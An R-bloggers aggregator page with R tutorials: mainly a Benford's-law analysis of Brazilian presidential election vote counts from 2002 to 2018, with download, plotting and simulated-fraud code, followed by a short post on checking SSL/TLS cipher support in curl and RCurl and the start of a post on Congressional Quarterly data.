Work is already underway on version 0.6.0. While 0.5.0 is more of an unsung hero, making changes and handling edge cases you are unlikely to notice, 0.6.0 will add some new user functions that enhance the ease with which you can restructure parsed e-book text that comes in looking like crap due to crappy e-book metadata (see the open source packaged EPUB file above as a good example of formatting sadness). The next version will help improve some situations like this in terms of section breaks and content sequence. Garbage in does not need to equal garbage out!

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Matt's R Blog. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Benford’s Law for Fraud Detection with an Application to all Brazilian Presidential Elections from 2002 to 2018

Sat, 11/17/2018 - 22:19

(This article was first published on R – insightR, and kindly contributed to R-bloggers)

By Gabriel Vasconcelos and Yuri Fonseca The intuition

Let us begin with a brief explanation about Benford’s law and why should it work as a fraud detector method. Given a set of numbers, the first thing we need to do is to extract the first digit of each number. For example, for (121,245,12,55) the first digits will be (1,2,1,5). Perhaps our intuition would say that for a large set of numbers, each first digit, from 1 to 9, would appear in equal proportion, that is for each digit between 1 and 9. However, Benford’s law shows us that this is not true. In fact, smaller digits will have larger probabilits. If you want to see a very didactic explanation of why this happen just watch this video https://www.youtube.com/watch?v=XXjlR2OK1kM&t=460s . We could not give a better explanation.

The probability of each first digit can be obtained through the following formula:

which will result in the following probabilities:

benford1 = log10(1+1/1:9) names(benford1) = 1:9 barplot(benford1)

benford1 ## 1 2 3 4 5 6 ## 0.30103000 0.17609126 0.12493874 0.09691001 0.07918125 0.06694679 ## 7 8 9 ## 0.05799195 0.05115252 0.04575749 Generalization to more than one digit

The Benford’s law can be generalized to more digits. We will show the results for the first two digits and for the second digit alone. The formula for the first two digits is the same as the formula for the first digit with between 10 and 99.

benford12 = log10(1+1/10:99) names(benford12) = 10:99 barplot(benford12)

Finally, probabilities for the second digit alone can be obtained from the plot above by adding the probabilities that have the same second digits, from 0 to 9.

library(tidyverse) aux = 10:99 - floor(10:99/10)*10 benford2 = (data.frame(v1 = benford12,v2 = aux) %>% group_by(v2) %>% summarise(v1 = sum(v1)))$v1 names(benford2) = 0:9 barplot(benford2)

When can we use the Benford’s law?

Naturally, the Benford’s law requires data in a large range that goes through several orders of magnitude. For example, the law will not work for heights and weights of human beings. However, it is more likely to work for average heights of all species in the world or for the population of all countries in the world.

Application: Brazilian Presidential Elections from 2002 to 2018

The Brazilian electoral system has raised a lot of inflamed discussion in the previous years, especially when we were closer to the 2018 elections. Most of the critiques come from the fact that the Brazilian elections use an electronic ballot box that does not print the vote. Some people say these electronic devices are safe and some people say they make the elections blurry and impossible to audit. The latest discussion were mostly focused on the following facts:

  • Brazilian congress passes a bill that forces the electronic devices to print the votes. The voter would then verify the information in the paper and put it in a regular ballot box. If the electoral results came to be suspicious we could count the paper votes to see if the results match.

  • President Dilma used her veto power on this bill, forcing the elections to stay as they were, without the printed votes.
  • The Congress had a new voting that bypassed the president’s veto and reestablished the printed votes.
  • The Supreme Court declared the new bill to be unconstitutional and that was the end of the discussion. We had the elections only with the electronic votes.

Of course this raised a lot of critiques because there was a lot a pressure coming from the government to stop printed votes. Moreover, the same party was on the government for the fourth four years term and most of the judges is the Supreme Court were put there by them. We also had some public trials where hackers would try to break the electronic ballot and so they did without any problems.

On the other hand, no one knew exactly how a potential fraud would be performed without raising suspicion, the discussion was very speculative and did not solve anything. A alternative media company called Brasil Paralelo started a research on the Benford’s law and committed to use the law in the 2018 elections. Previous tests showed that the 2010 elections were fine and raised some doubts about the 2014 elections. They showed their results in a video and said that they found close to 80% inconsistency in the data in the 2018 first round. They were going to publish a document with more details on the results but we were not able to find it. Therefore, we will base our opinion solely on the video. The data is published by the government and they used it in a aggregation level of electoral zones, which is in fact the most adequate aggregation. An electoral zone is like a school, where we have several rooms with ballots where people go to vote. The size of electoral zones has a lot of variation going from a few hundreds or less to more than 50000, thus the use of the Benford’s law seems adequate. However, this study did  not answer all our questions (that is our personal opinion) because of the following reasons:

  • We have our doubts on how efficiently the Benford’s law can detect frauds. In the empirical example we will fraud the data to show that we need a significant change to be able to see the fraud. Moreover, it is very hard that any real data will fit perfectly to the law. This has been widely shown by a chi2 test that rejects the data following the law, even if the figures show a very good fit. Therefore, we can only be suspicious if the data deviates a lot from the Benford’s law and, in our opinion, we should also be concerned about changing patterns in the data. For example, the same tests should be performed to many elections to see what changes between them. The data from many elections is easy to download and organize (as we will show in the application) and we could not find comparisons between elections in the Brasil Paralelo application.

  • It is possible to fail to detect the fraud if we apply the law to all the data at the same time. Therefore, one should try to use sub-samples such as regions and states to give more robustness to the results. Brasil Paralelo did that, but they went to far in our opinion. Many of their sub-samples are not big enough. The fact is that we need large samples to have a reasonable convergence to the Benford’s law distribution. What we understood from the video is that they tested more than 100 sub-samples, only for the first digit equals 1. They based their analysis a lot on State level subsamples and many States may have a bad result just because the sample is very small. This comments take me to the next problem:
  • They did more than 100 tests of the Benford’s law and reported them in the video for the first digit equals 1. They used a confidence band of 3% and rejected all tests that had a proportion of 1s as the first digit outside the interval. The high inconsistency they reported in the end means that many of the sub-samples had proportions outside the intervals. The tricky thing here is that the intervals are the same for all sub-samples, i.e. they did not control the intervals for the sample size, which is something very obvious. If they did, and compared to all elections since 2002, they would probably find that based on their criteria all elections would be inconsistent, which only means that this test is not very good.

 

We would like to apologize to Brasil Paralelo if our comments were unfair. They were based on the video alone and we may have missed something. Their analysis was very good and they were very brave to do it. They only deserve our respect.

Disclosure: We are not going to try to fake neutrality. We are all for transparency and the chain of events that killed the printed vote bill is very weird. However, we will try to make our analysis as unbiased as possible. The most important thing here is that all the results can be reproduced by anyone with a little knowledge of R. We are not audit experts and we do can make mistakes.

2002 elections library(tidyverse)

The first step was to download de data and to create a function that transformed the votes into digits proportion to compare with the Benford’s law. We put the download code, the function and some metadata on Brazilian regions in the end of the post.

We will start the analysis by assuming that the 2002 elections were fine, otherwise we have no base to compare the other elections. Moreover, the analysis will be on the second round of the elections.

## Prepare the data for the Benford's law ## data2002 = prepare_data(elections2002, round = 2, ncandidates = 2)

Now let us see how the data fits to the Benford’s law. The bars represent the Benford’s law and the lines are the proportion of digits for each candidate. The adjustment of the data to the Benford’s law is very good in the three figures below.

dt = data2002 bar = barplot(benford1, ylim = c(0,0.4), main = "2002 First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford2, ylim = c(0,0.2), main = "2002 Second Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$second$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford12, ylim = c(0,0.06), main = "2002 First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

We could not find anything interesting in the second digit analysis alone. Therefore, we will only show the results for the first digit and the first and second digits together from here on. If you want to see the results for the second digit you can do it yourself by modifying the second digit code above to other data. Additionally, in the end of the post we show an analysis where we induce some fraud to the data to see how the Benford’s law behaves. The code is very simple and you can use it to test several types of fraud.

Looking at the Regions

Brazil has five regions of States, in this part of the post we will look at the two biggest regions (Southeastern and Northeastern regions). The reason is that the fraud may be small, local and hard to detect if we look at the entire country. These two regions have enough data to make us comfortable with the sample size. First, let’s prepare the data:

data2002SE = prepare_data(filter(elections2002, SIGLA_UF %in%SE),2,2) data2002NE = prepare_data(filter(elections2002, SIGLA_UF %in%NE),2,2)

The plots are generated with the code below. As you can see, if we move to regions we find some bigger deviations, especially in the SE region. It is very hard to say if this is a pattern from the data or a fraud. The best we could think of is to look at other years and see if the pattern stays the same.

dtlist = list("2002SE"=data2002SE, "2002NE" = data2002NE) lim = 0.4 for(j in 1:2){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Comparing all elections from 2002 to 2014 Brazil

Preparing the data:

data2002 = prepare_data(elections2002,2,2) data2006 = prepare_data(elections2006,2,2) data2010 = prepare_data(elections2010,2,2) data2014 = prepare_data(elections2014,2,2)

The code below plots the Benford’s law and the data for all elections between 2002 and 2014 for the entire country. Although we may see small variations across the years. we don’t think we can say anything about fraud by looking only at these plots. Assuming 2002 was ok, all the figures below can say is that 2006, 2010 and 2014 were also ok.

dtlist = list("2002"=data2002,"2006"=data2006,"2010"=data2010,"2014"=data2014) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Southeastern Region

Preparing the data:

data2002SE = prepare_data(filter(elections2002, SIGLA_UF %in%SE),2,2) data2006SE = prepare_data(filter(elections2006, SIGLA_UF %in%SE),2,2) data2010SE = prepare_data(filter(elections2010, SIGLA_UF %in%SE),2,2) data2014SE = prepare_data(filter(elections2014, SIGLA_UF %in%SE),2,2)

The code below plots the Benford’s law and the data for all elections between 2002 and 2014 for the Southeastern region. The conclusions here as the same as the conclusions for the entire country. If 2002 was fine then the other years were also fine. Note that the plots show the winner in red and the looser in green. Since Aecio won in the Southeast the colors are alternated in the 2014 plot. Nevertheless, Dilma’s patters remains the same as in 2010 and the same as Lula’s pattern in 2002 and 2006. Dilma was Lula’s candidate after his two terms and they are from the same party. The opposition candidate was always from the same party too.

dtlist = list("2002SE"=data2002SE,"2006SE"=data2006SE,"2010SE"=data2010SE,"2014SE"=data2014SE) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Northeastern Region

Preparing the data:

data2002NE = prepare_data(filter(elections2002, SIGLA_UF %in%NE),2,2) data2006NE = prepare_data(filter(elections2006, SIGLA_UF %in%NE),2,2) data2010NE = prepare_data(filter(elections2010, SIGLA_UF %in%NE),2,2) data2014NE = prepare_data(filter(elections2014, SIGLA_UF %in%NE),2,2)

The code below plots the Benford’s law and the data for all elections between 2002 and 2014 for the Northeastern region. Here we can start to see some difference in the plots that may raise some doubts. In 2002, everything was fine and the data for both candidates fit the Benford’s law very well. However, since 2006 we have a clear deviation from the law for the candidate that won the elections. The proportion of ones as the first digit decreases a lot and the proportion of larger values are mostly bigger than what the Benford’s law would predict. Similar results are found if we look at the first two digits together. This could be due to a change in voting patters or fraud. However, if we choose the fraud hypothesis we would have to assume that all elections were fraudulent between 2006 and 2014. This could be the case, because in 2006 Lula was reelected, meaning that he was already in the government and may have had some influence in the electoral process. Still, we don’t think the Benford’s law is useful to detect frauds alone. It can only be useful to support other evidence and perhaps give a stronger confirmation. Results like this could be used as a starting point to further investigation on the elections. However, auditing electronic ballot boxes is not easy.

dtlist = list("2002NE"=data2002NE,"2006NE"=data2006NE,"2010NE"=data2010NE,"2014NE"=data2014NE) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

2018 elections

The 2018 elections were very different. First, the use of social media was very important and second, the opposition candidate in the second round was from a whole new party. The worker’s party still managed to put a candidate (Fernando Haddad) in the second round. Moreover, Dilma was impeached in 2016 and the vice president Temer assumed. Recall that the 2018 elections must be downloaded directly from the government page. In the end of the post we give the details on how to download the data and put it in the same format as the 2002-2014 data for the same code to work.

First, let us look at the entire country. The results are generated by the code below. The figure is just below the code. Once again, every thing looks fine if we look at the entire country. The data fits very well to the Benford’s law.

# prepare the data # data2018 = prepare_data(elections2018,2,2) dt = data2018 par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018 First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018 First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Southeast Region

Now let’s move to the Southeastern region. Here we have something very unusual. The curve for both candidates deviate significantly from the Benford’s law if we compare this region with previous elections. The curve for Fernando Haddad overestimates the smaller digits and underestimates the bigger digits and the curve for Jair Bolsonaro shows the opposite situation. Although the fit for the SE region was not perfect in previous elections, it followed the same pattern that was broken in 2018.

# prepare the data # data2018SE = prepare_data(filter(elections2018,SIGLA_UF%in%SE),2,2) dt = data2018SE par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018SE First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018SE First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Northeast Region

Next, the NE region. There is nothing new here. The worker’s party candidate has the same pattern from the 2006-2014 period and the other candidate looks fine. Therefore, to say that the 2018 elections were fraudulent in the NE region we must also say that all elections from 2006 to 2014 were also fraudulent.

# prepare the data # data2018NE = prepare_data(filter(elections2018,SIGLA_UF%in%NE),2,2) dt = data2018NE par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018NE First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018NE First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

A brief look at the first round

Finally, let’s have a look at the first round of the 2018 elections in the NE and SE regions to see if there is something new. The first plot is for the SE region. It also shows the votes for the third place candidate. The pattern is the same as the second round. However, since Fernando Haddad and Ciro Gomes had similar results, if the elections were fraudulent it was probably to influence the results of Jair Bolsonaro. It is impossible to know if the fraud was to increase or decrease the number of votes. However, most critiques on the electronic system came from him and his supporters and he is also the author of the printed vote bill.

data2018SEfr = prepare_data(filter(elections2018,SIGLA_UF%in%SE),1,3) dt = data2018SEfr bar = barplot(benford1, ylim = c(0,0.4), main = "2018SE First Digit, First Round") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Finally, the NE region. We don’t know if we can get any new information from that. The worker’s party candidate has the same weird pattern from previous elections and from the second round of the 2018 elections. However, in the second round the first digit equals one was closer to 0.2 and now it is closer to the Benford’s value of 0.3. Bolsonaro had similar results from the second round with a little more variation in smaller digits. We will not risk to say anything about the other candidate because we have nothing to compare it with.

data2018NEfr = prepare_data(filter(elections2018,SIGLA_UF%in%NE),1,3) dt = data2018NEfr bar = barplot(benford1, ylim = c(0,0.4), main = "2018NE First Digit, First Round") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Conclusion

We think that the main conclusion here is that the Benford’s law alone does not prove anything. It still need the narrative and other evidence. In my opinion, the lack of transparency in the electronic system is a bigger problem than what the data is saying through the Benford’s law. If the elections were more transparent any suspicious results one could find could be further investigated. However, We don’t think that is the case.

Downloading the data

The data from 2002 to 2014 can be downloaded with the electionsBR package. The 2018 data must be downloaded manually.

######## Download Data from TSE ########## library(electionsBR) elections2010 = electionsBR::vote_mun_zone_fed(2010) elections2014 = electionsBR::vote_mun_zone_fed(2014) elections2002 = electionsBR::vote_mun_zone_fed(2002) elections2006 = electionsBR::vote_mun_zone_fed(2006)

After you download all the data, save the tables in a .csv or a .rda to avoid downloading it again. The 2018 data can be downloaded from:

http://agencia.tse.jus.br/estatistica/sead/odsele/votacao_candidato_munzona/votacao_candidato_munzona_2018.zip

The presidential data must be arranged to be in the same format as the other years:

library(tidyverse) elections2018 = read.csv("votacao_candidato_munzona_2018_BR.csv",sep =";",header = TRUE,fileEncoding = "latin1") ## select one the variables we used ## elections2018 = elections2018 %>% select(DS_CARGO,SG_UF,QT_VOTOS_NOMINAIS,NM_MUNICIPIO,NR_ZONA,NM_URNA_CANDIDATO,NR_TURNO) %>% filter(QT_VOTOS_NOMINAIS>0) ## unify variable names colnames(elections2018) = c("DESCRICAO_CARGO","SIGLA_UF","TOTAL_VOTOS","NOME_MUNICIPIO","NUMERO_ZONA","NOME_URNA_CANDIDATO","NUM_TURNO") elections2018$DESCRICAO_CARGO = toupper(elections2018$DESCRICAO_CARGO) Function to arrange data and other metadata

The code below shows the function we used to arrange de data. It filters for president, the desired round and the number of candidates. If you chose 3 candidates it will select the three most voted. Note that if you chose round = 2 the number of candidate must be 2 or 1. The function also extracts the first and second digits for each zone and calculates the proportion of each digit. It returns a list where each element is named after a candidate and each candidate has three data.frames: for the first digit, second digit and first and second digits together.

### States in each Brazilian region SE = c("SP","MG","ES","RJ") NE = c("BA","PE","CE","MA","AL","RN","PA","PI","SE") S = c("PR", "RS", "SC") CO = c("GO","DF","MT","MS") N = c("AM", "RR", "AP", "PA","TO","RO","AC") regions = list(SE=SE,NE=NE,S=S,CO=CO,N=N) prepare_data = function(data, round=1, ncandidates=2) { ## select only second round president and create one table for each candidate ## president = data %>%filter(NUM_TURNO == round, DESCRICAO_CARGO == "PRESIDENTE") candidates = president %>% group_by(NOME_URNA_CANDIDATO)%>% summarise(votes = sum(TOTAL_VOTOS)) %>% arrange(desc(votes)) candidates_data = list() for(i in 1:ncandidates){ candidates_data[[i]] = president %>% filter(NOME_URNA_CANDIDATO == candidates$NOME_URNA_CANDIDATO[i]) } names(candidates_data) = candidates$NOME_URNA_CANDIDATO[1:ncandidates] for(i in 1:ncandidates){ aux = candidates_data[[i]] rem = ifelse(aux$TOTAL_VOTOS>=10,1,NA) candidates_data[[i]]$fd = as.numeric(str_sub(aux$TOTAL_VOTOS,1,1)) candidates_data[[i]]$sd = as.numeric(str_sub(aux$TOTAL_VOTOS,2,2))*rem candidates_data[[i]]$f2d = as.numeric(str_sub(aux$TOTAL_VOTOS,1,2))*rem } output = list() for(i in 1:length(candidates_data)){ aux = candidates_data[[i]] d1 = aux%>% group_by(fd) %>% count() d2 = (aux%>% group_by(sd) %>% count())[1:10,] d12 = (aux%>% group_by(f2d) %>% count())[1:90,] n1 = nrow(aux) n2 = n12 = nrow(filter(aux,!is.na(sd))) df1 = data.frame(1:9,d1[,2]/n1,n1) df2 = data.frame(0:9,d2[,2]/n2,n2) df12 = data.frame(10:99,d12[,2]/n12,n12) colnames(df1) = colnames(df2) = colnames(df12) = c("digit", "prop", "n") dflist = list(first = df1, second = df2, fands = df12) output[[i]] = dflist } names(output) = names(candidates_data) return(output) } Code to induce fraud

Here we will induce fraud in the 2002 data to see if the Benford’s law can capture it by adding 1000 votes in all electoral zones. We know this is not a realistic fraud because some electoral zones are very small, but this test is just to see how the fraudulent data fits to the Benford’s law. Feel free to try different types of fraud.

## create fraudulent data ## elections2002fake = elections2002 %>% mutate(TOTAL_VOTOS = TOTAL_VOTOS+1000) ## Prepare the real data and the fraudulent data for the Benford's law ## data2002 = prepare_data(elections2002, round = 2, ncandidates = 2) data2002fake = prepare_data(elections2002fake, round = 2, ncandidates = 2)

Now let us have a look at what happens in the fraudulent data compared to the real data, just for the first candidate (Lula) to save some space. Feel free to look at the second candidate by changing the value [[1]] to [[2]]. The three figures below show that the fraudulent data deviates a lot from the Benford’s law. However, if you try very small changes in the data the deviation would be harder to identify.

bar = barplot(benford1, ylim = c(0,0.4), main = "2002 First Digit with Fraud") lines(bar,data2002[[1]]$first$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$first$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford2, ylim = c(0,0.2), main = "2002 Second Digit with Fraud") lines(bar,data2002[[1]]$second$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$second$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford12, ylim = c(0,0.06), main = "2002 First and Second Digits with Fraud") lines(bar,data2002[[1]]$fands$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$fands$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Now we are going to show a justification for not using the chi2 test through all the post. The test statistic is defined as follows:

where is the estimated proportion of digit from de data and is the proportion of digit if given by the Benford’s law. The distribution is a chi2 with 8 degrees of freedom. we calculated the p-values for this test below to show that it rejects the real data and the fraudulent data.

chireal = data2002[[1]]$first$n[1]*sum(((data2002[[1]]$first$prop - benford1)^2)/(benford1)) chifraud = data2002fake[[1]]$first$n[1]*sum(((data2002fake[[1]]$first$prop - benford1)^2)/(benford1)) 1-pchisq(chireal,8) ## [1] 1.215743e-10 1-pchisq(chifraud,8) ## [1] 0 var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R – insightR. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Tis the Season to Check your SSL/TLS Cipher List Thrice (RCurl/curl/openssl)

Sat, 11/17/2018 - 18:00

(This article was first published on R – rud.is, and kindly contributed to R-bloggers)

The libcurl library (the foundational library behind the RCurl and curl packages) has switched to using OpenSSL’s default ciphers since version 7.56.0 (October 4 2017). If you’re a regular updater of curl/httr you should be fairly current with these cipher suites, but if you’re not a keen updater or use RCurl for your web-content tasks, you are likely not working with a recent cipher list and may start running into trouble as the internet self-proclaimed web guardians keep their wild abandon push towards “HTTPS Everywhere”.

Why is this important? Well, as a web consumer (via browsers) you likely haven’t run into any issues when visiting SSL/TLS-enabled sites since most browsers update super-frequently and bring along modern additions to cipher suites with them. Cipher suites are one of the backbones of assurance when it comes to secure connections to servers and stronger/different ciphers are continually added to openssl (and other libraries). If a server (rightfully) only supports a modern, seriously secure TLS configuration, clients that do not have such support won’t be able to connect and you’ll see errors such as:

SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure

You can test what a server supports via tools like SSL Test. I’d point to a command-line tool but there are enough R users on crippled Windows systems that it’s just easier to have you point and click to see. If you are game to try a command-line tool then give testssl a go from an RStudio terminal (I use that suggestion specifically to be platform agnostic as I cannot assume R Windows users know how to use a sane shell). The testssl script has virtually no dependencies so it should “work everywhere”. Note that both SSL Test and testsslmake quite a few connections to a site so make sure you’re only using your own server(s) as test targets unless you have permission from others to use theirs (go ahead and hit mine if you like).

You can also see what your R client packages support. One could run:

library(magrittr) read.table( text = system("openssl ciphers -v", intern=TRUE) %>% gsub("[[:alpha:]]+=", "", .) ) %>% setNames( c("ciphername", "protoccol_version", "key_exchange", "authentication", "symmetric_encryption_method", "message_authentication_code") )

in attempt to do that via the openssl binary on your system, but Windows users likely won’t be able to run that (unlike every other modern OS including iOS) and it might not show you what your installed R client packages can handle since they may be using different libraries.

So, another platform-agnostic (but requiring a call to a web site, so some privacy leakage) is to use How’s My SSL.

ssl_check_url <- "https://www.howsmyssl.com/a/check" jsonlite::fromJSON( readLines(url(ssl_check_url), warn = FALSE) ) -> base_chk jsonlite::fromJSON( RCurl::getURL(ssl_check_url) ) -> rcurl_chk jsonlite::fromJSON( rawToChar( curl::curl_fetch_memory(ssl_check_url)$content ) ) -> curl_chk

Compare the $given_cipher_suites for each of those to see how they compare and also take a look at $rating. macOS and Linux users should have fairly uniform results for all three. Windows users may be in for a sad awakening (I mean you’re used to that on a regular basis, so it’s cool). You can also configure how you communicate what you support via the ssl_cipher_list cURL option (capitalization is a bit different with RCurl but I kinda want you to use the curl package so you’re on your own to translate. Note that you can’t game the system and claim you can handle a cipher you don’t actually have.

FIN

You should try to stay current with the OpenSSL (or equivalent) library on your operating system and also with the libcurl library on your system and then the curl, openssl, and RCurl packages. You may have production-rules requiring lead-times for changing configs but these should be in the “test when they make it to CRAN and install as-soon-as-possible-thereafter” category.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R – rud.is. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Congress Over Time

Sat, 11/17/2018 - 14:25

(This article was first published on R on kieranhealy.org, and kindly contributed to R-bloggers)

Since the U.S. midterm elections I’ve been playing around with some Congressional Quarterly data about the composition of the House and Senate since 1945. Unfortunately I’m not allowed to share the data, but here are two or three things I had to do with it that you might find useful.

The data comes as a set of CSV files, one for each congressional session. You download the data by repeatedly querying CQ’s main database by year. In its initial form, the top of each file looks like this:

Results for 79th Congress , Last,First,Middle,Suffix,Nickname,Born,Death,Sex,Position,Party,State,District,Start,End,Religion,Race,Educational Attainment,JobType1,JobType2,JobType3,JobType4,JobType5,Mil1,Mil2,Mil3 Abernethy,Thomas,Gerstle,,,05/16/1903,01/23/1953,M,U.S. Representative,Democrat,MS,4,01/03/1945,01/03/1953,Methodist,White,Professional degree,Law,,,,,Did not serve,, Adams,Sherman,,,,01/08/1899,10/27/1986,M,U.S. Representative,Republican,NH,2,01/03/1945,01/03/1947,Not specified,White,Bachelor's degree,Construction/building trades,,,,,,,

The bottom of each file looks like this:

